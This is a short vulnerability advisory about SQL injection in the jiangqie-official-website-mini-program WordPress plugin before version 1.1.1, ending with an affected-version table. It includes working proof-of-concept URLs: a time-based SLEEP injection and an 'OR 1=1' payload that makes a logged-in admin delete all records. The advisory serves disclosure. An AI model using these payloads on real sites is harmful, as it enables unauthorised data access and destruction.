The plugin does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection issues
https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action;=detail&id;=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))a) Could also make a logged in admin delete all the records: https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action;=delete&id;=1+OR+1%3D1
CPE | Name | Operator | Version |
---|---|---|---|
jiangqie-official-website-mini-program | lt | 1.1.1 |